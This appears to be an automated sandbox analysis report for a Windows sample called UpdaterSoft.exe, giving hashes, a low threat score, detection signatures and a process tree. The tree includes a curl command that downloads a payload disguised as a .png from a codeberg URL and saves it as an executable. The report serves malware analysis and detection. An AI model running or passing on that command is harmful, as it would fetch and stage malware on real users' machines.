Analysis

  • max time kernel
    94s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-12-2024 03:39

General

  • Target

    UpdaterSoft.exe

  • Size

    100KB

  • MD5

    cd2b6c28a8690c90953625c38ad21c05

  • SHA1

    cc9f6d12be5f2ee6001af0a6d7399619bb2ea721

  • SHA256

    1ecd4b2fc4c5ba45e58005df147b1f8cf51db8fabe1be76fb2ece1e55d42c4ff

  • SHA512

    8c54b0e9baba8be6105072e36aa2b02672a29c5ed138c5de306a55468c2ead66afe786a88719e0404cada45e1bbf0cf4f4ca24acb98f84b99ded31a09b9f8152

  • SSDEEP

    1536:kE/hIxHHWMpdPa5wiE21M8kJIGFvb1CwL/L5syuyUzR9aBfI+v3GVm:3SwMpdCq/IM8uIGfh/L5sNFVm

Score
3/10

Malware Config

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\UpdaterSoft.exe
    "C:\Users\Admin\AppData\Local\Temp\UpdaterSoft.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3860
    • C:\Windows\SysWOW64\curl.exe
      curl -o "C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240626703.exe" "https://codeberg.org/whoachek/33333/raw/branch/main/1/vqafmixmmr.png" -H "User-Agent: Mozilla/5.0" -H "Accept: */*"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3912

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240626703.exe

    Filesize

    1.9MB

    MD5

    f1c31db067049938dd0de6ebcecccbff

    SHA1

    95def6211ec6e9355fee6141dec60077e6ab2daf

    SHA256

    3f9a251541dd3516a0a75a3591733c3cd76207e09bc3ef9e7d0ae2b9d00b0288

    SHA512

    6c0aea6d5b20b17f02df92ca55a57499b1f1d27e7ba0f99c4ab39ffe9fa83de4a01b008cb78dd4ff0555848bf9ece56c989c4267bd4ccff3cd7b9d604701e3ea